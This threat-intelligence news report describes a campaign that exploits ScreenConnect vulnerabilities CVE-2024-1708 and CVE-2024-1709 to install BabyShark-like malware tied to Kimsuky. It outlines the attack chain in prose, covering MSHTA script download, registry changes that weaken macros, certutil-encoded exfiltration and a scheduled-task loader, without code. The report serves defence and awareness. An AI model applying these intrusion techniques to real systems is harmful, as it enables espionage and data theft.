A threat actor has been observed exploiting a recently disclosed critical vulnerability in the ConnectWise ScreenConnect remote access tool to deploy a malware strain similar to the Babyshark malware family associated with a North Korean state-backed cyberespionage group known as Kimsuky, Thallium and Velvet Chollima.
BabyShark is a Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to the command-and-control (C2) server, maintains persistence on the system, and waits for further instructions from the operator.
The new campaign, detected by Kroll's threat response team, involved the exploitation of CVE-2024-1708 and CVE-2024-1709, two ScreenConnect vulnerabilities patched last month. CVE-2024-1709 is an authentication bypass issue, which can allow a remote non-authenticated attacker to bypass the authentication process and gain full access to the system, while CVE-2024-1708 is a path traversal issue that can be used to conduct directory traversal attacks. When exploited in tandem, the vulnerabilities could be used to perform remote code execution post-authentication.
According to Kroll, the threat actor gained access to the victim’s workstation by exploiting the exposed setup wizard of the ScreenConnect application. The attackers then used command prompt (cmd.exe) to run the MSHTA utility, through which a heavily obfuscated VB script was downloaded. This script downloaded and executed the next stage payload implementing a set of functionalities, including setting Windows registry keys, capturing and exfiltrating system information (host, user, network and security software information along with installed software and running processes), setting up a scheduled task.
The malware then runs several commands to modify the Windows registry to allow untrusted and trusted macros run without notification, turning off some macro protections in those versions.
“The reason for the script to set these registry keys is not immediately apparent since execution has already been achieved. One potential reason might be to make victims more susceptible to later phishing attacks, should the initial infection fail to establish persistent access or be remediated,” the researchers wrote.
After capturing the required information, the malware uses the inbuilt Windows command certutil to encode the stolen information in a Privacy Enhanced Mail (PEM) certificate, which it then exfiltrates to the C2 web application. This technique was seen in precious attacks by Kimsuky, the researchers noted. The infostealer code finishes up by deleting both the capture and certificate files.
Finally, the malware creates a scheduled task that researchers theorize could act “as a rudimentary loader for a further stage of malware.”
